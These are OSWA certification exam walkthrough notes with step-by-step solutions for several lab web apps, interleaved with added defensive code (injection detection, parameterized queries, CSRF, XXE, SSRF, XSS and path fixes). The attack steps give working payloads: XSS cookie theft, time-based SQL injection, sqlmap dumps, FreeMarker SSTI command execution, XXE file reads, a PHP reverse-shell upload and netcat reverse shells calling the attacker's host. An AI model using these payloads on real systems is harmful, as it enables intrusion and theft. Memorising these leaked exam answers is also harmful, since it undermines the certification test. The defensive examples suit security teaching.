OSWA Exam
192.168.X.62 Share Notez
local (XSS/CSRF)
Create a user account
Log in to your newly created account
The password change feature is flawed: it doesn't check the old password, there is no CSRF protection, and no CORS restriction either:
function changePassword() {
    var password = $('#newPassword').val();
    var postBody = "password=" + password;
    fetch('[Link]', {
        method: 'POST',
        mode: 'cors',
        credentials: 'include',
        headers: {
            'Content-Type': 'application/x-www-form-urlencoded;charset=UTF-8'
        },
        body: postBody
    });
}
In the "Report", post the XSS payload (you can probably do a CSRF directly, but that is easier with Burp Pro) in <script src=[Link], the script being:
fetch('[Link]', {
    method: 'POST',
    credentials: 'include',
    headers: {
        'Content-Type': 'application/x-www-form-urlencoded'
    },
    body: 'password=password',
    mode: 'no-cors'
})
or steal the localStorage; on Kali: python3 -m [Link] 9090
fetch('[Link]
Wait 5 minutes, the admin will review it
Log in as Administrator with the new password (or the localStorage token); you will get the local flag
proof (needs completion)
The delete function is PostgreSQL injectable after a UUID prefix, but it may not be possible to read files?!
POST /api/admin/note/delete?noteId=AAAAA-BBBB-UUUID-HERE-FILTER'%3b(select+1+from+pg_sleep(5))%3b+--+-
POST /api/admin/note/delete?noteId=XXXXXXXXXXXXX';select+case+when+substring(table_name,1,1)%3d'a'+then+pg_sleep(5)+else+pg_sleep(0)+end+from+information_schema.tables+limit+1;+--
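Defender's view of the probes above (added example, not part of these notes): a detector run over constructed Apache-style access-log lines. It decodes each request target and flags time-based and stacked-query indicators. The log lines, addresses and timestamps are made up for the example; only the /api/admin/note/delete shape follows the requests above.

```python
import re
from urllib.parse import unquote_plus

# Constructed sample access log (common log format). The two 10.0.0.9 delete
# requests mirror the shape of the time-based probes described above.
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jan/2024:10:00:00 +0000] "POST /api/admin/note/delete?noteId=3f2d9c0e-1111-4a2b-9c3d-000000000001 HTTP/1.1" 200 17
10.0.0.5 - - [01/Jan/2024:10:00:01 +0000] "GET /notes HTTP/1.1" 200 512
10.0.0.9 - - [01/Jan/2024:10:00:02 +0000] "POST /api/admin/note/delete?noteId=AAAA-BBBB'%3b(select+1+from+pg_sleep(5))%3b+--+- HTTP/1.1" 200 17
10.0.0.9 - - [01/Jan/2024:10:00:08 +0000] "POST /api/admin/note/delete?noteId=XXXX';select+case+when+substring(table_name,1,1)%3d'a'+then+pg_sleep(5)+else+pg_sleep(0)+end+from+information_schema.tables+limit+1;+-- HTTP/1.1" 200 17
10.0.0.9 - - [01/Jan/2024:10:00:15 +0000] "POST /login HTTP/1.1" 200 88
"""

LOG_LINE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# (pattern, label) pairs checked against the decoded request target
SQLI_INDICATORS = [
    (re.compile(r"pg_sleep\s*\(", re.I), "postgres time-based"),
    (re.compile(r"waitfor\s+delay", re.I), "mssql time-based"),
    (re.compile(r"\bsleep\s*\(|\bbenchmark\s*\(", re.I), "mysql time-based"),
    (re.compile(r"information_schema", re.I), "schema enumeration"),
    (re.compile(r"'\s*;|'\s*--|;\s*--", re.I), "stacked query / comment terminator"),
]


def decode_target(target):
    """Decode percent/plus encoding twice so double-encoded payloads are visible too."""
    return unquote_plus(unquote_plus(target))


def scan_log(text):
    """Return one finding per log line whose request target matches an indicator."""
    findings = []
    for line in text.splitlines():
        m = LOG_LINE.match(line)
        if not m:
            continue
        decoded = decode_target(m.group("target"))
        hits = [label for pat, label in SQLI_INDICATORS if pat.search(decoded)]
        if hits:
            findings.append({
                "ip": m.group("ip"),
                "ts": m.group("ts"),
                "target": m.group("target"),
                "indicators": hits,
            })
    return findings


def ips_to_investigate(findings):
    """Distinct source addresses with at least one hit, for triage."""
    return sorted({f["ip"] for f in findings})


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f["ts"], f["ip"], f["indicators"])
```

The other signal in the constructed data is timing: a pg_sleep(5) probe shows up as a gap of about five seconds between consecutive requests from the same source, so correlating per-IP inter-request delay catches probes that use names the pattern list does not know.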
192.168.X.86 | Star Purpose (by Kaleb)
local
SQLi in the username (put a quote ' and identify the DBMS from the error message)
Dump with sqlmap and grab the user and password:
sqlmap -u [Link] --forms --batch --dbs
and then replace --dbs with -D starfires --dump
Connect as admin and get the local flag.
proof
1. Create a new post and select the checkbox 'Archive uncompressed'
2. Run a listener on your Kali: nc -lvnp 9090
3. In Burp, perform a command injection in the archive parameter, for example
blogPost=fooBar&archiveCheckbox=XAK2Wzaagh;nc -c bash YOURIP 9090
or
blogPost=fooBar&archiveCheckbox=archive"|nc -nv YOURIP 9090 -e /bin/bash |
Don't forget to URL-encode if needed
Read [Link]
192.168.X.65 Hello MecSecPay
local
Put data in both "Last Name" and "Zipcode" (but not in EasyCode)
Zipcode (or possibly Last Name) is vulnerable to "Microsoft SQL Server/Sybase stacked queries (comment)"
Save the Burp request, and run SQLMap and dump the credentials:
sqlmap -r [Link] -p zipcode --dbs --batch
sqlmap -r [Link] -p zipcode --batch -D micrathene --tables
sqlmap -r [Link] -p zipcode --batch -D micrathene --dump
Enumerate the app pages with ffuf -u [Link] -w /usr/share/wordlists/dirb/[Link] and find the page "controlpanel"
Use the credentials to access the admin account, and get the local flag
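The fix for the three injection points above (the Star Purpose username, the zipcode field, the noteId of the delete endpoint) is the same: bind the value as a parameter and, for the note id, canonicalise it as a UUID first. Added example, not code from the target apps; sqlite3 stands in for PostgreSQL and SQL Server so it runs offline, and the table rows are constructed.

```python
import sqlite3
import uuid

# sqlite3 stands in for PostgreSQL / SQL Server so this runs offline; the only
# thing that changes with a real driver is the placeholder style ("?" vs "%s").
def build_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password_hash TEXT, role TEXT)")
    conn.execute("CREATE TABLE notes (note_id TEXT PRIMARY KEY, owner TEXT)")
    conn.executemany(
        "INSERT INTO users VALUES (?, ?, ?)",
        [("admin", "hash-a", "admin"), ("alice", "hash-b", "user")],  # constructed rows
    )
    conn.execute("INSERT INTO notes VALUES (?, ?)", ("3f2d9c0e-1111-4a2b-9c3d-000000000001", "alice"))
    conn.commit()
    return conn


def lookup_user_unsafe(conn, username):
    """The shape behind the username SQLi above: user input concatenated into SQL."""
    sql = "SELECT username, role FROM users WHERE username = '" + username + "'"
    return conn.execute(sql).fetchall()


def lookup_user_safe(conn, username):
    """Bound parameter: the driver sends the value separately, it is never parsed as SQL."""
    return conn.execute("SELECT username, role FROM users WHERE username = ?", (username,)).fetchall()


def delete_note_safe(conn, note_id):
    """Canonicalise the id as a UUID before it goes anywhere near the query, then bind it."""
    try:
        canonical = str(uuid.UUID(note_id))
    except (ValueError, AttributeError, TypeError):
        raise ValueError("noteId is not a UUID")
    return conn.execute("DELETE FROM notes WHERE note_id = ?", (canonical,)).rowcount


if __name__ == "__main__":
    db = build_db()
    print("unsafe:", lookup_user_unsafe(db, "' OR '1'='1"))
    print("safe:  ", lookup_user_safe(db, "' OR '1'='1"))
```

A stacked-query payload on the noteId never reaches the database: the UUID check rejects it, and even without that check a bound parameter is a value, not statement text, so the trailing ";select ..." has nothing to attach to.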
proof
There is a Server-Side Template Injection (SSTI) in the Receipt menu > template [Link]
Change the template (you may need to adapt if the framework is different):
${"freemarker.template.utility.Execute"?new()("id")}
${"freemarker.template.utility.Execute"?new()("cat [Link]")}
Go to the Reports (menu on the left) and select from 2021 to today; you'll see multiple "EasyCode".
Now go back to the main page, enter this EasyCode, simulate a user who would pay their statement, enter a fake card, and once payment is validated, click print receipt; this generates a receipt from the template and renders it.
192.168.X.68 Ninox Printwerks
local
1. In [Link] you can see the bios of two users, niomi and noah
2. Create an account ([Link]), then log in with it.
3. Browse to [Link]
4. Enable interception of requests in Burp (or change the hidden form values)
5. Change the hidden input 'userid' (CSRF works, and so does the change without the current password)
6. Change the userid to 1 (noah), remove the parameter oldpass
7. Now you can log in with username noah and the password you set; he is admin
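The Share Notez password change (no old password, no CSRF token, no CORS restriction) and the Ninox hidden userid come down to the same handler bug. Added example, not code from either app: a password-change handler that takes the account from the session, requires the current password, and checks both the Origin header and a per-session CSRF token. The origin https://app.example.test, the in-memory user store and the dict-shaped request are assumptions.

```python
import hashlib
import hmac
import secrets

# Constructed in-memory user store: user_id -> (salt, pbkdf2 hash)
USERS = {}
ALLOWED_ORIGINS = {"https://app.example.test"}  # assumption: the application's own origin


def hash_password(password, salt):
    return hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, 100_000)


def add_user(user_id, password):
    salt = secrets.token_bytes(16)
    USERS[user_id] = (salt, hash_password(password, salt))


def verify_login(user_id, password):
    if user_id not in USERS:
        return False
    salt, stored = USERS[user_id]
    return hmac.compare_digest(hash_password(password, salt), stored)


class Session:
    """Server-side session: carries the authenticated user and a per-session anti-CSRF token."""
    def __init__(self, user_id):
        self.user_id = user_id
        self.csrf_token = secrets.token_urlsafe(32)


def change_password(session, headers, form):
    """Hardened handler. `headers` and `form` are plain dicts standing in for the request.

    Returns (ok, reason) so each rejected case is visible.
    """
    # 1. A cross-origin POST (the fetch() from a foreign page above) carries a foreign Origin.
    if headers.get("Origin") not in ALLOWED_ORIGINS:
        return False, "bad origin"
    # 2. The per-session token must be echoed back; constant-time compare.
    if not hmac.compare_digest(form.get("csrf_token", ""), session.csrf_token):
        return False, "bad csrf token"
    # 3. The account to change comes from the session, never from a hidden 'userid' field.
    user_id = session.user_id
    salt, stored = USERS[user_id]
    # 4. The current password must verify before a new one is accepted.
    if not hmac.compare_digest(hash_password(form.get("oldpass", ""), salt), stored):
        return False, "old password mismatch"
    new_password = form.get("password", "")
    if len(new_password) < 12:
        return False, "new password too short"
    add_user(user_id, new_password)  # re-salt and store
    return True, "changed"


if __name__ == "__main__":
    add_user(1, "noah-initial-secret")
    s = Session(1)
    print(change_password(s, {"Origin": "https://evil.example.test"}, {"password": "password"}))
    print(change_password(s, {"Origin": "https://app.example.test"},
                          {"csrf_token": s.csrf_token, "oldpass": "noah-initial-secret",
                           "password": "new-long-password-123"}))
```

Two caveats. The Origin check is a second line, not a replacement for the token: a request without an Origin header is refused here, which is right for modern browsers on POST but may need a Referer fallback for older clients. And none of this helps once a stored XSS runs on the app's own origin, as in the "Report" field: injected script can read the token from the page, so the XSS itself has to be fixed with output encoding.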
proof
1. Place a new order in [Link] with a normal user, and put the XXE payload in the "Model content":
<?xml version="1.0"?> <!DOCTYPE data [ <!ELEMENT foo ANY> <!ENTITY xxe SYSTEM "[Link]"> ]> <foo>&xxe;</foo>
2. Click on your Order Id, then "Submit for Review", and note the Order Id (it must then
show "Order Status: Under Review")
3. Log out, and log back in as admin; in the admin page, click "View orders", select the previous Order Id, then click "Check Model"; this will not render in the browser, so get the result in Burp Suite:
{"status": "ok", "message": "Model data parsed succesfully", "parsed": "FLAG_HERE\n"}
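Added example, not the Ninox code: a parser for the "Model content" field that refuses any DTD before the XML reaches the parser, which shuts out the external-entity payload above along with entity-expansion bombs. The sample documents and the file path placeholder are constructed.

```python
import re
import xml.etree.ElementTree as ET

# Any DTD at all is refused: external entities, parameter entities and entity-expansion
# bombs all need one, and a model file has no legitimate use for it.
DTD_MARKER = re.compile(rb"<!(DOCTYPE|ENTITY)\b", re.I)

# Constructed payload in the shape of the XXE above; the file path is a placeholder.
SAMPLE_XXE = (b'<?xml version="1.0"?><!DOCTYPE data [ <!ELEMENT foo ANY> '
              b'<!ENTITY xxe SYSTEM "file:///PLACEHOLDER_PATH"> ]><foo>&xxe;</foo>')
SAMPLE_OK = b"<model><name>cube</name><units>mm</units></model>"


def parse_model_content(data):
    """Parse an uploaded model document, refusing DTDs before the parser sees them.

    Returns (root_tag, {child_tag: text}).
    """
    if isinstance(data, str):
        data = data.encode("utf-8")
    # Non-UTF-8 encodings (UTF-16 and friends) are refused so the DTD check cannot be
    # dodged by re-encoding; a NUL byte in text is never legitimate either.
    try:
        data.decode("utf-8")
    except UnicodeDecodeError:
        raise ValueError("model content must be UTF-8")
    if b"\x00" in data:
        raise ValueError("NUL byte in model content")
    if DTD_MARKER.search(data):
        raise ValueError("DTD / entity declarations are not accepted")
    root = ET.fromstring(data)
    return root.tag, {child.tag: (child.text or "") for child in root}


if __name__ == "__main__":
    print(parse_model_content(SAMPLE_OK))
    try:
        parse_model_content(SAMPLE_XXE)
    except ValueError as exc:
        print("rejected:", exc)
```

In production the usual answer is the defusedxml package, which forbids DTDs and entity expansion inside the parser itself; the pre-check above is what to do when only the standard library is available. Malformed XML still raises ET.ParseError, which the caller should map to a generic "model could not be parsed" rather than echoing parser internals.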
OLD local, SSRF not useful anymore
Create a user account in [Link]
Log in at [Link]
In [Link] select "Get Content from URL" and insert the SSRF
[Link]
You will get the session key in the result
Replace the session key in Burp Suite/Chrome Dev tools
Access the admin profile page
Click Admin Panel and you get the [Link]
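Added example, not from the app: the check a "Get Content from URL" feature should run before fetching, rejecting loopback, RFC1918, link-local (cloud metadata) and IPv4-mapped addresses whether given as literals or reached through DNS. The resolver table and host names are constructed so it runs offline; the real OS resolver is included as the default.

```python
import ipaddress
import socket
from urllib.parse import urlsplit


def address_is_internal(ip_text):
    """True for anything that is not a public unicast address: loopback, RFC1918,
    link-local (cloud metadata lives at 169.254.169.254), multicast, reserved, CGNAT."""
    addr = ipaddress.ip_address(ip_text)
    if addr.version == 6 and addr.ipv4_mapped is not None:
        addr = addr.ipv4_mapped  # ::ffff:127.0.0.1 is still loopback
    return (addr.is_loopback or addr.is_private or addr.is_link_local
            or addr.is_multicast or addr.is_reserved or addr.is_unspecified
            or not addr.is_global)


def system_resolver(host):
    """Resolve with the OS resolver; returns every address the name maps to."""
    return sorted({info[4][0] for info in socket.getaddrinfo(host, None)})


# Constructed resolver table so the example runs offline (names and mappings are made up;
# 8.8.8.8 / 8.8.4.4 are only used as obviously public addresses).
DEMO_TABLE = {
    "public.example.test": ["8.8.8.8"],
    "intranet.example.test": ["10.0.0.5"],
    "dual.example.test": ["8.8.4.4", "127.0.0.1"],
}


def demo_resolver(host):
    try:
        return DEMO_TABLE[host]
    except KeyError:
        raise OSError("no such host")


def is_safe_fetch_target(url, resolver=system_resolver):
    """Decide whether a user-supplied URL may be fetched server-side. Returns (ok, reason)."""
    parts = urlsplit(url)
    if parts.scheme not in ("http", "https"):
        return False, "scheme not allowed"
    if parts.username is not None or parts.password is not None:
        return False, "userinfo not allowed"
    host = parts.hostname
    if not host:
        return False, "no host"
    if host == "localhost" or host.endswith(".localhost"):
        return False, "localhost"
    try:
        addresses = [str(ipaddress.ip_address(host))]  # literal IP, no lookup needed
    except ValueError:
        try:
            # Odd spellings such as 2130706433 or 0x7f.1 are not IP literals to
            # ipaddress; the resolver turns them into addresses that get checked below.
            addresses = resolver(host)
        except OSError:
            return False, "unresolvable host"
    for ip_text in addresses:
        if address_is_internal(ip_text):
            return False, "resolves to internal address " + ip_text
    return True, "ok"


if __name__ == "__main__":
    for u in ("http://public.example.test/", "http://intranet.example.test/", "http://[::ffff:127.0.0.1]/"):
        print(u, is_safe_fetch_target(u, demo_resolver))
```

The check-then-fetch gap matters: a name can resolve to a public address during the check and to 127.0.0.1 when the HTTP client resolves it again (DNS rebinding), and a redirect can point anywhere. Connect to the address that was validated rather than re-resolving, and either disable redirects or run every hop through the same check.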
192.168.X.80 Ryan's Retro Review
local
Below the login form, there is a text saying "I will review all login attempts in loginChecker"; this means logins are probably reflected somewhere
Log in with a request such as: username=<script+src=[Link]</script>&password=aaa&submit=Log+On
with [Link] being:
[Link]='[Link]
Grab the cookie and log in as Administrator
Run ffuf/dirbuster with [Link] and you'll find the page /_private/ where the flag is
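The loginChecker reflection above and the Share Notez "Report" field are both missing output encoding. Added example, not the apps' code: rendering attempted usernames as inert text in an HTML element context, plus the cookie attributes and CSP header that limit what an injected script could do. The sample attempts and the ATTACKER-HOST name are constructed.

```python
import html
from urllib.parse import quote

# Constructed login attempts as a review page would list them; the script tag
# mirrors the payload shape above, with a placeholder host.
SAMPLE_ATTEMPTS = [
    "alice",
    "bob'; --",
    '<script src="https://ATTACKER-HOST.example/x.js"></script>',
    "<img src=x onerror=alert(1)>",
]


def render_login_checker(attempts):
    """Element-content context: escape <, >, &, and both quote characters, so every
    attempted username becomes literal text in the reviewer's page."""
    items = "".join("<li>%s</li>" % html.escape(name, quote=True) for name in attempts)
    return '<ul id="loginChecker">%s</ul>' % items


def session_cookie_header(token):
    """Cookie attributes that blunt a successful XSS: HttpOnly hides the value from
    document.cookie, SameSite limits cross-site sends, Secure keeps it off plaintext HTTP."""
    return "Set-Cookie: session=%s; Path=/; HttpOnly; Secure; SameSite=Lax" % quote(token, safe="")


def csp_header():
    """No inline script and no third-party script sources: an injected <script src=...>
    that somehow survives encoding is still refused by the browser."""
    return ("Content-Security-Policy: default-src 'self'; script-src 'self'; "
            "object-src 'none'; base-uri 'none'")


def payload_is_inert(rendered):
    """True when the only tags in the rendered page are the ones render_login_checker emits."""
    body = rendered
    for tag in ('<ul id="loginChecker">', "</ul>", "<li>", "</li>"):
        body = body.replace(tag, "")
    return "<" not in body and ">" not in body


if __name__ == "__main__":
    print(render_login_checker(SAMPLE_ATTEMPTS))
    print(session_cookie_header("example-token"))
    print(csp_header())
```

Encoding is context-specific: html.escape is right for element content and quoted attributes, but a username placed inside a JavaScript string, a URL, or an unquoted attribute needs the encoder for that context instead.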
proof
Administrator has access to more projects, in [Link]
There is a blacklist filter in the cmd project; for example it is possible to run hostname but not whoami.
You can bypass the filter by adding bash quotes, for example: ca't' [Link]
192.168.X.70 (old Lamp)
local
In the main page, click "Order Custom", then change the "Type of Lamp"
In Burp Suite, replace the lamp type with ./[Link]
The config file contains the root password.
Log in with the root password, then you will find the [Link]
proof
In the Lamp Template page, upload a PHP reverse shell ([Link])
Access it with the URL [Link]
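Added example, not from the Lamp app: the two checks that close the "Type of Lamp" traversal and the template-page upload, a path-containment check against a base directory and an upload name that keeps only an allowlisted extension. The directories /srv/lamp/templates and /srv/lamp/uploads and the extension list are assumptions.

```python
import os
import secrets

TEMPLATE_DIR = "/srv/lamp/templates"   # assumption: where lamp templates live
UPLOAD_DIR = "/srv/lamp/uploads"       # assumption: a directory outside the web root
ALLOWED_UPLOAD_EXT = {".png", ".jpg", ".jpeg"}


def contained_path(base_dir, user_path):
    """Join and resolve, then refuse anything whose real path leaves base_dir
    (../ sequences, absolute paths, symlinks pointing out of the tree)."""
    base = os.path.realpath(base_dir)
    candidate = os.path.realpath(os.path.join(base, user_path))
    if os.path.commonpath([base, candidate]) != base:
        raise ValueError("path escapes " + base_dir)
    return candidate


def lamp_template_path(lamp_type):
    """The 'Type of Lamp' value selects a template file; separators and dot-names are
    rejected outright, and the containment check backs that up."""
    if not lamp_type or lamp_type in (".", "..") or any(ch in lamp_type for ch in "/\\\x00"):
        raise ValueError("invalid lamp type")
    return contained_path(TEMPLATE_DIR, lamp_type + ".tpl")


def stored_upload_name(original_name):
    """Keep only an allowlisted extension from the client's filename; the basename is
    replaced with a random one, so 'shell.php' and 'shell.php.jpg' cannot end up as
    something the web server would execute."""
    ext = os.path.splitext(original_name)[1].lower()
    if ext not in ALLOWED_UPLOAD_EXT:
        raise ValueError("file type not allowed")
    return secrets.token_hex(16) + ext


def stored_upload_path(original_name):
    """Full path under the upload directory, passed through the same containment check."""
    return contained_path(UPLOAD_DIR, stored_upload_name(original_name))


if __name__ == "__main__":
    print(lamp_template_path("desk"))
    print(stored_upload_path("photo.PNG"))
    for bad in ("../config.php", "/etc/passwd"):
        try:
            lamp_template_path(bad)
        except ValueError as exc:
            print("rejected:", exc)
```

The extension allowlist only decides the stored name; the directory it lands in must also be served without script execution (or not served at all, with downloads going through a handler), since a web server that executes by content type rather than by extension would not care about the name.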
192.168.X.85 (old Kaleb)
local
There is a hidden page [Link]
Run cewl on this page to create a wordlist: cewl [Link]
Log in to [Link] with the username "kaleb" and password "Pulchritudinous"
You will find the local flag
proof
Post a message in the admin page, and select "Archive Uncompressed"
In Burp Suite, replace the last parameter "archive" with a command injection (for example nc -e IP_KALI 8080)
Inject the nc command with URL encoding and run the reverse shell
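The archive command injection (Star Purpose and Kaleb) and the blacklisted cmd project (Ryan's) share one fix: user input never goes to a shell. Added example, not from those apps: the archive step built as an argv list behind a strict id pattern, and a command runner keyed on an allowlist, so there is no filter to bypass with quotes. /var/archives and /var/posts are assumed paths.

```python
import re
import subprocess

POST_ID = re.compile(r"[A-Za-z0-9_-]{1,40}")
ARCHIVE_DIR = "/var/archives"  # assumption
POSTS_DIR = "/var/posts"       # assumption


def build_archive_command(post_id, compress):
    """Build argv for archiving a post. The value from the form is validated against a
    strict pattern and placed as ONE argv element; no shell ever sees it, so ';', '|'
    or quotes in it are data, not syntax."""
    if not POST_ID.fullmatch(post_id):
        raise ValueError("invalid post id")
    suffix = ".tar.gz" if compress else ".tar"
    flag = "-czf" if compress else "-cf"
    return ["tar", flag, ARCHIVE_DIR + "/" + post_id + suffix, "-C", POSTS_DIR, post_id]


def archive_post(post_id, compress):
    """Run the archive step with shell=False (the default for a list argv)."""
    argv = build_archive_command(post_id, compress)
    return subprocess.run(argv, capture_output=True, text=True, timeout=30, check=False).returncode


# The 'cmd project' pattern, fixed: an allowlist of complete argv vectors keyed by a name.
# A blacklist of words (block 'whoami', allow 'hostname') is what the ca't' trick gets
# past; here there is no string to mangle, only a key that either exists or does not.
ALLOWED_COMMANDS = {
    "hostname": ["hostname"],
    "uptime": ["uptime"],
    "date": ["date", "-u"],
}


def run_allowlisted(name):
    try:
        argv = ALLOWED_COMMANDS[name]
    except KeyError:
        raise ValueError("command not allowed: %r" % name)
    return subprocess.run(argv, capture_output=True, text=True, timeout=5, check=False).stdout


if __name__ == "__main__":
    print(build_archive_command("XAK2Wzaagh", False))
    for bad in ("XAK2Wzaagh;nc -c bash 10.0.0.1 9090", "ca't'"):
        try:
            build_archive_command(bad, False)
        except ValueError as exc:
            print("rejected:", exc)
    print(run_allowlisted("date").strip())
```

Where a shell really is unavoidable (a pipeline that cannot be expressed as one argv), the fallback is shlex.quote on every interpolated value, but that is a weaker position than never building a command string at all.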